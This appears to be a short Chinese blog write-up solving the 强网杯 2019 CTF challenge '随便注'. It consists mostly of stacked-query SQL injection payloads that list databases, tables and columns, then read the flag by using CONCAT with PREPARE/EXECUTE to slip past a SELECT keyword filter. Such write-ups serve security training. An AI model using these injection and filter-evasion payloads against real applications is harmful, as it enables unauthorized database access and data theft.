[强网杯 2019]随便注
1';#
1';show databases;#
0';show databases;#
0';show tables;#
0'; show columns from `1919810931114514`; #
反单引号 ` 把纯数字的表包起来
SET @b = xxxx 设置变量@b为xxxx CONCAT('a','b') 将a,b内容进行拼接 PREPARE a FROM @b; 定义预处理语句将预处理语句说明为a EXECUTE a; 执行预处理语句
0';SET @b=CONCAT('SEL','ECT flag FROM `1919810931114514`;');PREPARE a FROM @b;EXECUTE a;
[强网杯 2019]随便注最先出现在Python成神之路。
共有 0 条评论